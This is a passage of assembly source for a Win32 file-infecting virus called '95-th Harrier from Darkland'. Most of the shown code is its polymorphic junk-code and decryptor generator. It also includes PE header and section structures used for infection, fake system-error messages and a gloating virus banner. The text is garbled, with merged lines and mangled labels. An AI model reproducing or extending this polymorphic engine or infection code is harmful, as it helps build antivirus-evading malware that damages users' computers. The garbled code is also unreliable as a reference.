JZ Genarmem_R_1 $
MOV Al, 28h
Genarmem_R_1 $: OR Al, 1h
Stosb
XOR Al, 28h
Call Storebyte
POP EAX
Push EBX
MOV EBX, EAX
Genarmem_R_2 $: Call getNoespreg
CMP AL, BL
JE Genarmem_R_2 $
CMP Al, BH
JE Genarmem_R_2 $
SHL Al, 3H
OR Al, BL
POP EBX
MOV AH, Al
Call Genarmem_comp $
RET
Genarmem_Imm $: MOV Al, 2H; Add; Sub (IMM)
Call Random
Add Al, Al
OR Al, 81H
Stosb
Call Storebyte
XCHG EAX, [ESP]
Push EAX
MOV Al, 2H
Call Random
OR Al, Al
POP EAX
JZ Genarmem_i_1 $
OR Al, 28h
Genarmem_i_1 $: MOV AH, Al
XOR AH, 28H
Call Genarmem_comp $
POP EAX
CMP Al, 83H
JNE GENARMEM_I_2 $
MOV AX, 100H; Byte Operand
Call Random
Stosb
Call Storebyte
RET
Genarmem_i_2 $: MOV Eax, Randseed; DWORD OPERAND
Stosd
Call StoredWord
RET
Genarmem_comp $: Push Eax; Compile Addressing
And Al, 7h; Modes (Corrupt EAX)
CMP Al, 4h
JE Genarmem_c_1 $
CMP Al, 5h
JE Genarmem_c_2 $
POP EAX
Stosb
Genarmem_c0 $: MOV Al, AH
Push EAX
And Al, 7h
CMP Al, 4h
JE Genarmem_c_3 $
CMP Al, 5h
JE Genarmem_c_4 $
POP EAX
Call Storebyte
RET
Genarmem_c_1 $: POP EAX; [ESP]
Stosb
MOV Al, 24h
Stosb
JMP Genarmem_c0 $ GENARMEM_C_2 $: POP Eax; [EBP]
OR Al, 40h
And Al, 0FEH
Stosb
MOV Al, 25h
Stosb
MOV Al, 0H
Stosb
JMP Genarmem_c0 $
Genarmem_c_3 $: POP EAX; [ESP]
Call Storebyte
MOV Al, 24h
Call Storebyte
RET
Genarmem_c_4 $: POP Eax; [EBP]
OR Al, 40h
And Al, 0FEH
Call Storebyte
MOV Al, 25h
Call Storebyte
MOV Al, 0H
Call Storebyte
RET
; ------------------------------------------------- ------------
GenanyCom: Push EAX
Push Ebx; Some Command That
Push Edx; Changes Registers
MOV EBX, EAX; But Don't change Some
GenanyCom_0_1 $: Call getNoespreg; Registers By # in Ax (Ah, Al)
CMP Al, BL; (Corrupt Eax)
JE GenaiCom_0_1 $
CMP Al, BH
JE GenaiCom_0_1 $
MOV DL, Al
GENANYCOM_0_2 $: CALL GetNoespreg
CMP AL, BL
JE GenaiCom_0_2 $
CMP Al, BH
JE GenaiCom_0_2 $
MOV AH, DL
POP EDX
POP EBX
Push EAX
MOV Eax, 0Ch
Call Random
OR EAX, EAX
Jnz GenanyCom_1 $; "> 0"
POP Eax; Ar Command
POP EAX
JMP Genarcom
GenaiCom_1 $: Dec EAX
JNZ GenaiCom_2 $; "> 1"
POP Eax; Mov / Lea Command
POP EAX
Push Edx
Call genmovcom
POP EDX
RET
GenaiCom_2 $: Dec EAX
Jnz GenaiCom_3 $; "> 2"
POP EAX; CBW; CWDE
POP EAX
OR Al, Al
JZ Genaicom
OR AH, AH
JZ Genaicom
Mov Eax, 2h
Call Random
OR Al, Al
JZ GenaiCom_2_1 $
MOV Al, 66H
Stosb
GenanyCom_2_1 $: MOV Al, 98H
Stosb
RET
GenanyCom_3 $: DEC EAX
JNZ GenaiCom_4 $; "> 3"
POP EAX; CWD; CDQ
POP EAX
OR Al, Al
JZ Genaicom
OR AH, AH
JZ Genaicom
CMP Al, 2H
Je genanycom
CMP AH, 2H
Je genanycom
Mov Eax, 2h
Call Random
OR Al, Al
JZ GenaiCom_3_1 $
MOV Al, 66h
Stosb
GenanyCom_3_1 $: MOV Al, 99H
Stosb
RET
GenaiCom_4 $: Dec EAX
JNZ GenanyCom_5 $; "> 4"
POP EAX; AAA; DAA; DAS
POP EAX
OR Al, Al
JZ Genaicom
OR AH, AH
JZ Genaicom
Mov Eax, 4h
Call Random
SHL Al, 3H
OR Al, 27h
Stosb
RET
GenaiCom_5 $: DEC EAX
JNZ GenanyCom_6 $; "> 5"
POP Eax; Aad; AAM
POP EAX; Operand Must Be <> 0
OR Al, Al
JZ Genaicom
OR AH, AH
JZ Genaicom
Mov Eax, 2h
Call Random
OR Al, 0D4H
Stosb
MOV Al, 0FFH
Call Random
INC Al
Stosb
RET
GenanyCom_6 $: DEC EAX
Jnz GenanyCom_7 $; "> 6"
POP Eax; loop $ 2
POP EAX
CMP Al, 1h
Je genanycom
CMP AH, 1H
Je genanycom
MOV AX, 0E2H
Stosw
RET
GenaiCom_7 $: DEC EAX
Jnz GenaiCom_8 $; "> 7"
MOV Al, 0D1H; ROL; SHL;
STOSB; ROR; SHR; SAR;
POP Eax; RCL; RCR
Push EBX
MOV EBX, EAX
GenaiCom_7_0 $: MOV Eax, 8h
Call Random
CMP Al, 6h
JE GenaiCom_7_0 $
SHL Al, 3H
OR Al, BL
OR Al, 0C0H
Stosb
POP EBX
POP EAX
RET
GenanyCom_8 $: DEC EAX
Jnz GenanyCom_9 $; "> 8"
MOV Al, 89h; Mov Reg1, Reg2
Stosb
POP EAX
SHL Al, 3H
OR Al, AH
OR Al, 0C0H
Stosb
POP EAX
RET
GenaiCom_9 $: DEC EAX
JNZ GenaiCom_10 $; "> 9"
MOV Al, 4H; ADC; SBB; OR;
Call Random
INC Al
SHL Al, 3H
OR Al, 1h
Push EBX
MOV EBX, EAX
MOV Al, 2H
Call Random
SHL Al, 1h
OR Al, BL
POP EBX
Stosb
POP EAX
SHL Al, 3H
OR Al, AH
OR Al, 0C0H
Stosb
POP EAX
RET
GenanyCom_10 $: DEC EAX
JNZ GenaiCom_11 $; "> 10"
MOV Al, 2H; ADC; SBB; OR; And [IMM]
Call Random
OR Al, Al
POP EAX
Pushf
Push EAX
JZ GenaiCom_10A $
MOV Al, 66h
Stosb
GenanyCom_10A $: MOV EAX, 2H
Call Random
SHL Al, 1h
OR Al, 81H
Stosb
XCHG EAX, [ESP]
Push EBX
MOV EBX, EAX
Mov Eax, 4h
Call Random
INC EAX
SHL Al, 3H
OR Al, 0C0H
OR Al, BL
POP EBX
Stosb
POP EAX
CMP Al, 83H
Je GenaiCom_10b $
Mov Ax, Word Ptr Randseed; IMM16
Stosw
POPF
JNZ GenaiCom_10c $
MOV AX, Word Ptr Randseed 2; IMM32
Stosw
GenaiCom_10c $: POP Eaxret
GenanyCom_10b $: MOV EAX, 100H; IMM8
Call Random
Stosb
POPF
POP EAX
RET
GenaiCom_11 $: POP EAX
OR Al, 50H; Push Reg1 / POP Reg2
Stosb
Push Eax; Seria of Commands
Mov Eax, 5h
Call Random
Push ECX
MOV ECX, EAX
OR ECX, ECX
JZ GenAnycm_11_1 $
GENANYCM_11_1 $: MOV EAX, [ESP] [2 * 4]
Call Genanycom
Dec ECX
JNZ GENANYCM_11_2 $
GenaiCM_11_2 $: POP ECX
POP EAX
Mov Al, AH
OR Al, 58H
Stosb
POP EAX
RET
; ------------------------------------------------- ------------
Genarcom: Push Eax
Push Ebx; Some Command That Pretty
Push Edx; Changes Registers
MOV EBX, EAX; But Don't change Some
Genarcom_0_1 $: Call getNoespreg; Registers By # in Ax (Ah, Al)
CMP Al, BL; (Corrupt Eax)
JE Genarcom_0_1 $
CMP Al, BH
JE Genarcom_0_1 $
MOV DL, Al
Genarcom_0_2 $: CALL GetNoespreg
CMP AL, BL
JE Genarcom_0_2 $
CMP Al, BH
JE Genarcom_0_2 $
SHL Al, 3H
OR Al, DL
OR Al, 0C0H
POP EDX
POP EBX
Push EAX
Mov Eax, 7h
Call Random
OR EAX, EAX
JNZ Genarcom_1 $; "> 0"
POP Eax; Noreg Command
POP EAX
JMP gennoregcom
Genarcom_1 $: DEC EAX
JNZ Genarcom_2 $; "> 1"
MOV Al, 87h; Xchg Reg1, Reg2
Stosb
Call Storebyte
POP EAX
Stosb
Call Storebyte
POP EAX
RET
Genarcom_2 $: DEC EAX
JNZ Genarcom_3 $; "> 2"
PUSH reg1; Push Reg2
MOV AH, Al; Pop Reg2; Pop Reg1
And Al, 7h
OR Al, 50h
Stosb
Call Storebyte
Mov Al, AH
SHR Al, 3H
And Al, 7h
OR Al, 50h
Stosb
Call Storebyte
Push Ecx; Seria of Commands
Push EAX
Mov Eax, 5h
Call Random
MOV ECX, EAX
OR ECX, ECX
JZ Genarcom_2_1 $
Genarcom_2_2 $: MOV EAX, [ESP] [2 * 4]
Call gnarcom
Dec ECX
JNZ Genarcom_2_2 $
Genarcom_2_1 $: POP EAX
POP ECX
Mov Al, AH
And Al, 7h
OR Al, 58H
Stosb
Call Storebyte
Mov Al, AH
SHR Al, 3H
And Al, 7h
OR Al, 58HSTOSB
Call Storebyte
POP EAX
RET
Genarcom_3 $: DEC EAX
JNZ Genarcom_4 $; "> 3"
Mov Eax, 2H; xor reg1, reg2
Call Random
OR Al, 38h
OR Al, 1h
Stosb
Call Storebyte
POP EAX
Stosb
Call Storebyte
POP EAX
RET
Genarcom_4 $: DEC EAX
JNZ Genarcom_5 $; "> 4"
MOV Al, 2H; Add Reg1, Reg2
Call Random; Sub Reg1, REG2
OR Al, Al
JZ Genarcom_4_1 $
MOV Al, 28h
Genarcom_4_1 $: OR Al, 1H
Push EBX
MOV EBX, EAX
MOV Al, 2H
Call Random
OR Al, BL
Stosb
Call Storebyte
POP EBX
POP EAX
Stosb
Call Storebyte
POP EAX
RET
Genarcom_5 $: DEC EAX
JNZ Genarcom_6 $; "> 5"
MOV Al, 2H; Add; Sub; XOR [IMM]
Call Random
OR Al, Al
POP EAX
Pushf
Push EAX
JZ Genarcom_5_1 $
MOV Al, 66h
Stosb
Call Storebyte
Genarcom_5_1 $: MOV EAX, 2H
Call Random
SHL Al, 1h
OR Al, 81H
Stosb
Call Storebyte
XCHG EAX, [ESP]
Push EAX
Mov Eax, 3h
Call Random
SHL Al, 3H
Push ECX
MOV CL, Al
Mov Eax, 002830H
SHR EAX, CL
POP ECX
XCHG EBX, [ESP]
And BL, 7h
OR Al, BL
OR Al, 0C0H
Stosb
Call Storebyte
POP EBX
POP EAX
CMP Al, 83H
JE Genarcom_5_2 $
Mov AX, Word Ptr Randseed
Stosw
Call storeWord; IMM16
POPF
JNZ Genarcom_5_3 $
MOV AX, Word Ptr Randseed 2; IMM32
Stosw
Call Storeword
Genarcom_5_3 $: POP EAX
RET
Genarcom_5_2 $: MOV EAX, 100H; IMM8
Call Random
Stosb
Call Storebyte
POPF
POP EAX
RET
Genarcom_6 $: MOV Al, 0D1H; ROL REG, 1
Stosb; Ror REG, 1
Call Storebyte
POP EAX
Push EBX
MOV EBX, EAX
Mov Eax, 2h
Call Random
SHL Al, 3H
And BL, 0C7H
OR Al, BL
Stosb
Call Storebyte
POP EBX
POP EAX
RET
; ------------------------------------------------- ------------
Genmovcom: Push Ebx; Some Command That Loads
Mov EBX, EAX; Registers by Values
GenmovCom_1 $: Call getNoespreg; But don't change Some
CMP Al, BL; Register By # in AX (AH, Al) JE Genmovcom_1 $; set bit in mask
CMP Al, BH; Transferred in Edx
JE Genmovcom_1 $; (Corrupt EAX)
MOV EBX, EAX
Push ECX
MOV CL, Al
MOV Eax, 1
SHL EAX, CL
OR EDX, EAX; Set Bit in Mask
POP ECX
Mov Eax, 2h
Call Random
OR Al, Al
JZ Genmovcom_lea $
MOV Al, BL; Mov Style
OR Al, 0B8H
Stosb
Call Storebyte
Mov Eax, Randseed
Stosd
Call StoredWord
POP EBX
RET
Genmovcom_lea $: MOV Al, 8DH; Lea Style
Stosb
Call Storebyte
MOV Al, BL
SHL Al, 3H
OR Al, 5H
Stosb
Call Storebyte
Mov Eax, Randseed
Stosd
Call StoredWord
POP EBX
RET
; ------------------------------------------------- ------------
Gennoregcom: XOR Eax, Eax; Some Command That Don't
Mov Al, 0EH; Change Registers
Call Random; (Corrupt EAX)
OR EAX, EAX
JNZ gennoreg_1 $; "> 0"
Call gennoflagcom; Noflag Command
RET
Gennoreg_1 $: DEC EAX
JNZ gennoreg_2 $; "> 1"
MOV Al, 2H; CLC or STC
Call Random
OR Al, 0F8H
Stosb
RET
Gennoreg_2 $: DEC EAX
JNZ gennoreg_3 $; "> 2"
MOV Al, 2H; CLD or STD
Call Random
OR Al, 0fch
Stosb
RET
Gennoreg_3 $: DEC EAX
Jnz gennoreg_4 $; "> 3"
MOV Al, 0F5H; CMC
Stosb
RET
Gennoreg_4 $: DEC EAX
JNZ gennoreg_5 $; "> 4"
Mov Al, 4h; Or REG, REG
Call Random
OR Al, 8h
Stosb
Call getQReq
Stosb
RET
Gennoreg_5 $: DEC EAX
JNZ gennoreg_6 $; "> 5"
MOV Al, 4H; and REG, REG
Call Random
OR Al, 20H
Stosb
Call getQReq
Stosb
RET
Gennoreg_6 $: DEC EAX
JNZ Gennoreg_7 $; "> 6"
MOV Al, 4H; CMP reg1, Reg2
Call Random
OR Al, 38h
Stosb
Call getnoeqregs
Stosb
RET
Gennoreg_7 $: DEC EAX
Jnz gennoreg_8 $; "> 7"
MOV Al, 2H; Test Reg1, Reg2
Call Random
OR Al, 84H
Stosb
Call getnoeqregs
Stosb
RET
Gennoreg_8 $: Dec Eaxjnz Gennoreg_9 $; "> 8"
MOV Al, 2H; Test Reg, 0xxxxh
Call Random
OR Al, 0F6H
Stosb
Push EAX
Call getReg
OR Al, 0C0H
Stosb
POP EAX
CMP Al, 0F6H
JNE Gennoreg_8_1 $
Mov Eax, 100H
Call Random
Stosb
RET
Gennoreg_8_1 $: MOV EAX, Randseed
Stosd
RET
Gennoreg_9 $: DEC EAX
JNZ Gennoreg_10 $; "> 9"
MOV Al, 2H; CMP REG, 0XXXXH
Call Random
OR Al, 80h
Stosb
Push EAX
Call getReg
OR Al, 0F8H
Stosb
POP EAX
CMP Al, 80h
JNE Gennoreg_9_1 $
Mov Eax, 100H
Call Random
Stosb
RET
Gennoreg_9_1 $: MOV EAX, Randseed
Stosd
RET
Gennoreg_10 $: DEC EAX
JNZ gennoreg_11 $; "> 10"
Call GetNoespreg; Inc REG / DEC REG
OR Al, 40h
Push EBX
MOV BL, Al
MOV Al, 2H
Call Random
SHL Al, 3H
OR Al, BL
POP EBX
Stosb
Push Eax; Some Seria of Commands
Push ECX
MOV EAX, 5H; How Many..
Call Random
MOV ECX, EAX
OR ECX, ECX
JZ gennoreg_10_1 $
Gennoreg_10_2 $: Call GennoreGcom
Dec ECX
JNZ gennoreg_10_2 $
Gennoreg_10_1 $: POP ECX
POP EAX
XOR Al, 8h
Stosb
RET
Gennoreg_11 $: DEC EAX
JNZ gennoreg_12 $; "> 11"
MOV Al, 2H; ROL REG, 1 / ROR REG, 1
Call Random; Inc REG, 1 / DEC REG, 1
Push EAX
MOV Al, 2H
Call Random
OR Al, Al
POP EAX
MOV AH, 0D0H
Je gennoreg_11_0 $
MOV AH, 0FEH
Gennoreg_11_0 $: OR Al, AH
Push EAX
Stosb
Call GetNoespreg
OR Al, 0C0H
Push EBX
MOV BL, Al
MOV Al, 2H
Call Random
SHL Al, 3H
OR Al, BL
POP EBX
Stosb
Push Eax; Some Seria of Commands
Push ECX
MOV EAX, 5H; How Many..
Call Random
MOV ECX, EAX
OR ECX, ECX
JZ gennoreg_11_1 $
Gennoreg_11_2 $: Call GennoreGcom
Dec ECX
JNZ gennoreg_11_2 $
Gennoreg_11_1 $: POP ECX
POP EAX
XCHG EAX, [ESP]
Stosb
POP EAX
XOR Al, 8h
Stosb
RET
Gennoreg_12 $: DEC EAX
JNZ Gennoreg_13 $; "> 12"
MOV Al, 2H; Xchg Reg1, Reg2 (Twice) Call Random; (WITHOUT ESP)
OR Al, 86H
Push EBX
MOV BL, Al
Call getnoeqregs0
MOV AH, BL
POP EBX
XCHG AH, Al
Stosw
Push Eax; Seria ;-) from one command
Call gennoregcom
POP EAX
Stosw
RET
Gennoreg_13 $: MOV Al, 2H; Add; Sub; XOR [IMM]
Call Random; Sub; add; xor [IMM]
OR Al, Al
Pushf; _PREFIX
JZ gennoreg_13_1 $
MOV Al, 66h
Stosb
Gennoreg_13_1 $: MOV Al, 4H
Call Random
OR Al, 80h
Stosb
Push eax; _combyte
Mov Al, 3H
Call Random
SHL Al, 3H
Push eax; _comnum
Push ECX
MOV CL, Al
Mov Eax, 002830H
SHR EAX, CL
MOV ECX, EAX
Call GetNoespreg
OR CL, Al
Xchg Eax, [ESP]; _REGNUM
XCHG EAX, ECX
OR Al, 0C0H
Stosb
Mov Eax, Randseed
Push eax; _magicdword
MOV EAX, [ESP] [3 * 4]
CMP AL, 81H
JNE Gennoreg13_2 $
MOV EAX, [ESP]
Stosw
MOV EAX, [ESP] [4 * 4]
Push EAX
POPF
JNZ Gennoreg13_3 $
MOV EAX, [ESP]
SHR EAX, 16
Stosw
JMP Gennoreg13_3 $
Gennoreg13_2 $: MOV EAX, [ESP]
Stosb
Gennoreg13_3 $: Push Ecx; Seria of Commands..
Mov Eax, 5h
Call Random
MOV ECX, EAX
OR ECX, ECX
JZ gennoreg13_4 $
Gennoreg13_5 $: Call Gennoregcom
Dec ECX
JNZ Gennoreg13_5 $
Gennoreg13_4 $: POP ECX
Mov Eax, [ESP] [4 * 4]; Mirror Command
Push EAX
POPF
JZ gennoreg13_6 $
MOV Al, 66h
Stosb
Gennoreg13_6 $: MOV EAX, [ESP] [3 * 4]
Stosb
Push ECX
MOV ECX, [ESP] [2 * 4] 4
Mov Eax, 280030H
SHR EAX, CL
MOV ECX, EAX
MOV EAX, [ESP] [1 * 4] 4
OR Al, Cl
OR Al, 0C0H
Stosb
POP ECX
MOV EAX, [ESP] [3 * 4]
CMP AL, 81H
JNE Gennoreg13_7 $
MOV EAX, [ESP]
Stosw
MOV EAX, [ESP] [4 * 4]
Push EAX
POPF
JNZ Gennoreg13_8 $
MOV EAX, [ESP]
SHR EAX, 16
Stosw
Gennoreg13_8 $: Add ESP, 5 * 4
RET
Gennoreg13_7 $: MOV EAX, [ESP]
Stosb
Add ESP, 5 * 4
RET
; ------------------------------------------------- ------------
Gennoflagcom: xor Eax, Eax; Some Command That Don'tmov Al, 0ah; Change Anything
Call Random; (Corrupt EAX)
OR EAX, EAX
JNZ gennoflag_1 $; "> 0"
MOV Al, 90H; NOP Command
Stosb
RET
Gennoflag_1 $: DEC EAX
JNZ gennoflag_2 $; "> 1"
Gennoflag_1_1 $: MOV Al, 4H; Segments DS: ES: SS:
Call Random; WITHOUT CS:!
SHL Al, 3H
OR Al, 26h
CMP AL, 2EH
JE gennoflag_1_1 $
Stosb
RET
Gennoflag_2 $: DEC EAX
JNZ gennoflag_3 $; "> 2"
MOV AX, 0E3H; JECXZ $ 2
Stosw
RET
Gennoflag_3 $: DEC EAX
JNZ gennoflag_4 $; "> 3"
MOV Al, 2H; XCHG REG, REG
Call Random
OR Al, 86H
Stosb
Call getQReq
Stosb
RET
Gennoflag_4 $: Dec EAX
Jnz gennoflag_5 $; "> 4"
Mov Al, 4H; Mov Reg, REG
Call Random
OR Al, 88H
Stosb
Call getQReq
Stosb
RET
Gennoflag_5 $: DEC EAX
JNZ gennoflag_6 $; "> 5"
Call getNoespreg; Push REG / POP REG
OR Al, 50h
Stosb
Push Eax; Some Seria of Commands
Push ECX
MOV EAX, 5H; How Many..
Call Random
MOV ECX, EAX
OR ECX, ECX
JZ gennoflag_5_1 $
Gennoflag_5_2 $: Call Gennoflagcom
Dec ECX
JNZ gennoflag_5_2 $
Gennoflag_5_1 $: POP ECX
POP EAX
OR Al, 8h
Stosb
RET
Gennoflag_6 $: DEC EAX
JNZ gennoflag_7 $; "> 6"
MOV Al, 10H; JCC $ 2
Call Random
OR Al, 70h
Stosb
XOR Al, Al
Stosb
RET
Gennoflag_7 $: DEC EAX
JNZ gennoflag_8 $; "> 7"
MOV Al, 0EBH; JMPS $ ?
Stosb
MOV Al, 20H; JMP Distance..
Call Random
Stosb
Push ECX
MOV ECX, EAX
OR ECX, ECX
JZ Gennoflag_7_1 $
Gennoflag_7_2 $: MOV EAX, 100H
Call Random
Stosb
Dec ECX
JNZ gennoflag_7_2 $
Gennoflag_7_1 $: POP ECX
RET
Gennoflag_8 $: DEC EAX
JNZ gennoflag_9 $; "> 8"
MOV Al, 60H; Pusha / POPA
Stosb
Push Ecx; Some Seria of Commands
Mov Eax, 5H; How Many.. .Call random
MOV ECX, EAX
OR ECX, ECX
JZ gennoflag_8_1 $
Gennoflag_8_2 $: Call Gennoflagcom
Dec ECX
JNZ gennoflag_8_2 $
Gennoflag_8_1 $: POP ECX
MOV Al, 61H
Stosb
RET
Gennoflag_9 $: MOV Al, 9CH; Pushf / Popf
Stosb
Push Ecx; Some Seria of Commands
MOV EAX, 5H; How Many..
Call Random
MOV ECX, EAX
OR ECX, ECX
JZ gennoflag_9_1 $
Gennoflag_9_2 $: Call Gennoflagcom
Dec ECX
JNZ gennoflag_9_2 $
Gennoflag_9_1 $: POP ECX
MOV Al, 9DH
Stosb
RET
; ------------------------------------------------- ------------
GetnoeqRegs0: Call GetNoespreg; Get Registers MOD R / M
Push Ebx; Byte with any Noeq
MOV BL, Al; Registers Inside
Call GetNoespreg; this Pack (without ESP)
SHL Al, 3H
OR Al, BL
OR Al, 0C0H
POP EBX
RET
Getnoeqregs: Call getReg; Get Registers mod r / m
Push Ebx; Byte with any Noeq
MOV BL, Al; Registers Inside
Call getReg; this Pack
SHL Al, 3H
OR Al, BL
OR Al, 0C0H
POP EBX
RET
GetEQREGS: Call getReg; Get Registers MOD R / M
Mov Ah, Al; Byte with any Eq Registers
SHL Al, 3H; Inside this Pack
OR Al, AH
OR Al, 0C0H
RET
GetNoespreg: Call getReg; Get Register Number
CMP Al, 4H; But Without ESP
JE getNoespreg
RET
GetReg: MOV Eax, 8h; Get Register Number
Call Random
RET
; ------------------------------------------------- ------------
ENUMER: PUSH EAX; Enumerate The Some
PUSH ECX; Procedure In EBX
Mov Eax, Ecx; ECX Times with
Call Random; Parameters in EAX
OR ECX, ECX
JZ ENUMER_0 $
ENUMER_1 $: MOV EAX, [ESP] [4]
Call EBX
Dec ECX
JNZ ENUMER_1 $
ENUMER_0 $: POP ECX
POP EAX
RET
; ------------------------------------------------- ------------
Storebyte: CMP Byte Ptr PenableEncr, 0h; Stores The byte Data
JE StorebyTe_0 $; INTO ENCRYPTOR BUFFER
MOV [ESI], Al
Inc ESI
StorebyTe_0 $: Retstoreword: CMP Byte Ptr PenableEncr, 0h; Stores The Word Data
JE Storeword_0 $; INTO ENCRYPTOR BUFFER
MOV [ESI], AX
Add ESI, 2H
StoreWord_0 $: RET
StoredWord: CMP Byte Ptr PenableEncr, 0h; Stores The DWORD DATA
JE Storedword_0 $; INTO ENCRYPTOR BUFFER
MOV [ESI], EAX
Add ESI, 4H
StoredWord_0 $: RET
; ------------------------------------------------- ------------
Random: Push Edx; Generate Some Random Number
Push Ecx; To Eax by Border in EAX
Push Eax; (0..border-1)
Mov Eax, Randseed; Don't Corrupt Registers
MOV ECX, 8088405H; [from turbopascal v7.0]
Mul ECX; (Based on congruent)
Inc EAX; generating algorythm)
Mov randseed, EAX
POP ECX
Mul ECX
POP ECX
MOV EAX, EDX
POP EDX
RET
; Separetor = _nop
; ------------------------------------------------- ------------
Data for Convertor
Defcodeline
ConvertDatalen = 4h
ConvertData Label DWORD
DD Offset SearchStr1
DD Offset ReplaceSTR1
DD Offset SearchStr2
DD Offset ReplaceStr2
DD Offset SearchStr3
DD Offset ReplaceSTR3
DD Offset SearchStr4
DD Offset ReplaceSTR4
BreakcoDeline
SearchStr1 DB 'Microsoft', 0
SearchStr2 DB 'Windows', 0
SearchStr3 DB 'Bill Gates', 0
SearchStr4 DB 'Harrier', 0
ReplaceStr1 DB 'Microsoft', 0
ReplaceStr2 DB 'Windows', 0
ReplaceStr3 DB 'Gill Bates', 0
ReplaceStr4 DB 'OH! Guys! Is IT About Me?', 0
; ------------------------------------------------- ------------
Defcodeline
Infoname DB 'Oeminfo.ini', 0H
Infonamel = $ -INFONAME
BreakcoDeline
Defcodeline
Bitmapname DB 'Oemlogo.bmp', 0H
Bitmapnamel = $ -bitmapname
BreakcoDeline
SelfsectionName DB '.Text', 0,0,0
Infselfheader DB '"95-TH Harrier from Darkland"', 0InfenterDebug DB 'Entering to Debug Mode.', 0
Infcancelmsg DB 'Infecting Aborted by Creator!', 0
Infnonamemsg DB 'Name Not Specified.', 0
Defcodeline
Hellomsg Label Byte
DB 'OOPS, World, IT IS ME!', CR
DB 'CAN you image it? I am the win32 platform based virus!', Cr
DB 'Hey, Daniloff! Will You Porte your drweb at this platage form?', Cr
DB 'HMM, Guy, What You Think About Watcom C ?', Cr
DB CR
DB 'Greetings Goes To Gill Bates and to Her Mircosoft Windoze 95 SUCKS,', CR
DB 'and to rest lame part of world.', Cr
DB CR
DB 'Ugly Lamers Must Die!', Cr
DB CR
DB 'WHO AM I? I am The "95-TH HARRIER from Darkland" !!!', CR
DB 'i come from Dark, I invade Your PC And now i will incote your mind..', CR
DB CR
DB 'Technorat', Cr
DB CR
DB Ver, Release, Basedon, Cr
DB 0
BreakcoDeline
INFGODHELP DB 'God Will Help! ;-)', 0
; ------------------------------------------------- ------------
Defcodeline
Fuckmsgcounter = 6h
FuckMessages Label DWORD
DD fuckmsg1, fuckmsg2, fuckmsg3, fuckmsg4, fuckmsg5, fuckmsg6
BreakcoDeline
Fuckmsg1 DB 'System Malfunction!', 0
Fuckmsg2 DB 'vxds rings overcross!', 0
Fuckmsg3 DB 'CPU Mode Thunking Error!', 0
Fuckmsg4 DB 'CPU overclocked, Cooler Device EMERGENCY!', 0
Fuckmsg5 DB 'Help Subsystem Is Damaged!', 0
Fuckmsg6 DB 'Attention! BUGS INSIDE COMPUTER, Uses Softice.', 0
; ------------------------------------------------- ------------
Here Will Be Placed The Very Nice Files..
Bfile BitmapFile, Harrlogo.bmp, HarrbtmpFile_sz
Bfile Infofile, Harrinfo.ini, Harrinfofile_szmembase DD?; Program Base In Memory
Hostip dd?; For returning to host
Here DD?; Self Place in Ram
Debug DD 0H; Debugging Flag
HelpCounter DD 0H; for fuckinghelp ;-)
INITOK DD 1H; Initialize Semaphore:
; 0 - Process Performing
1 - Must Be Initialized
2 - Initialized OK.
; ------------------------------------------------- ------------
Real Copyright by Creator.
Defcodeline
IRPC Char, <(c) Reated by Technorat (HACKER)>
DB '& Char' xor 0ffh
ENDM
BreakcoDeline
; ------------------------------------------------- ------------
Randseed DD?
StubenTrylabel DD?
Imageplace DD?
CurrentPlace DD?
Polymorphsz DD 0H; The size of Decriptors
StubImportPlace DD?
IMPORTPLACE DD?
IMPORTLENGTH DD?
BufferPlace DD?
; ------------------------------------------------- ------------
; The Virtual Stack Variables
Var Dosheader, 40h; DOS HEADER PLACE
Var FileHandle, DWORD; Generic File Variables
Var FileAttributes, DWORD
Var filenameptr, dword
Var FileLastWrite, 8h; Generic File Date / Time
Var FileLastAccess, 8h
Var Filecreation, 8h
Var ProcessedBytes, DWORD
Var newseconds, Word
Var Packedtime, 8h
Var SomePath, Maxpathlen
Var PefileHeaders, DWORD
Var Importlegal, DWORD; Import Section Parameters
Var Importphysoffs, DWORD
Var Importrva, DWORD
Var Importflags, DWORD
Var Importorder, DWORD
Defcodeline
Var ft_struc, 0h; System Time Description
Var ft_year, word
Var ft_month, word
Var ft_dayofweek, word
Var ft_day, word
Var ft_Hour, Word
Var ft_minute, word
Var ft_second, Word
Var ft_milliseconds, word
BreakcoDeline
Var PBASEREG, BYTE; POLYMORPH GEN. VARS
Var psemreg, byte
Var PenableenCr, Byte
Var PBase, DWORD
VAR PSEM, DWORDVAR PXCHG, DWORD
VAR PMOV, DWORD
Var PBaseAdd, DWORD
Var PBaseSub, DWORD
Var Pagain, DWORD
Var Pagain_e, DWORD
Var Padd, DWORD
Var Gensz, DWORD; POLYMORPH LINK VARS
Var gencrsz, DWORD
Var Gentotalsz, DWORD
Var Cryptors, 2 * 4 * 16
Var Cryptcnt, DWORD
Defcodeline
VAR Section, 0H
SECTBEGIN = _VARADDR; section Header Description
VAR SECTNAME, 8H
Var SectVirtsize, DWORD
Var SECTRVA, DWORD
VAR SECTPHYSSIZE, DWORD
VAR SECTPHYSOFFS, DWORD
Var Sectr, 3 * 4h
VAR SECTFLAGS, DWORD
SectSize = _varaddr-sectbegin
BreakcoDeline
Defcodeline
VAR Selfsection, 0H
SelfsectBegin = _Varaddr; Self section Description
VAR SelfsectName, 8h
Var SelfsectVirtsize, DWORD
Var SelfseCtrva, DWord
Var SelfsectPhysize, DWORD
Var SelfsectPhysoffs, DWORD
Var Selfsectr, 3 * 4h
Var SelfsectFlags, DWORD
SelfsectSize = _varadDR-SelfsectBegin
BreakcoDeline
Defcodeline
Var peheader, 0h
Peheaderbegin = _Varaddr; pehader description
Var PE_SIGN, DWORD
VAR PE_CPUTYPE, WORD
Var PE_NUMOFSES, WORD
Var PE_TIMEDATE, DWORD
Var PE_PTRTOCOFFTBL, DWORD
Var PE_COFFTBLSIZE, DWORD
Var PE_NTHDRSIZE, WORD
Var PE_FLAGS, WORD
VAR PE_MAGIC, WORD
Var PE_LMAJOR, BYTE
Var PE_LMINOR, BYTE
Var PE_SIZEOFCODE, DWORD
Var PE_SIZEOFIDATA, DWORD
Var PE_SIZEOFUIDATA, DWORD
VAR PE_ENTRYPOINTRVA, DWORD
Var PE_BASEOFCODE, DWORD
Var PE_BASEOFDATA, DWORD
Var PE_IMAGEBASE, DWORD
Var PE_ObjectAlign, DWORD
Var PE_FILALIGN, DWORD
Var PE_OSMAJOR, WORD
Var PE_OSMINOR, WORD
Var PE_USERMAJOR, WORD
Var PE_USERMINOR, WORD
Var PE_SUBSYSMAJOR, WORD
Var PE_SUBSYSMINOR, WORD
Var PE_R1, DWORD
Var PE_IMAGESIZE, DWORD
Var PE_HEADERSIZE, DWORD
Var PE_FILECHKSUM, DWORD
